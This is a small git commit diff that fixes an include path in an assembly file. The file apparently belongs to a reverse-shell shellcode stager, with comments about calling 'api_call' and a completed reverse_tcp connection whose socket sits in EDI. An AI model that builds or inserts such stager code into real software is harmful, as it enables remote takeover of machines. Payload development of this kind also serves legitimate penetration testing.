Bugfix: correct reference to asm file
This commit is contained in:
+1
-1
@@ -14,6 +14,6 @@
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_reverse_winhttp_http.asm"
|
||||
%include "./src/block/block_reverse_winhttp.asm"
|
||||
; By here we will have performed the reverse_tcp connection and EDI will be our socket.
|
||||
|
||||
|
||||
Reference in New Issue
Block a user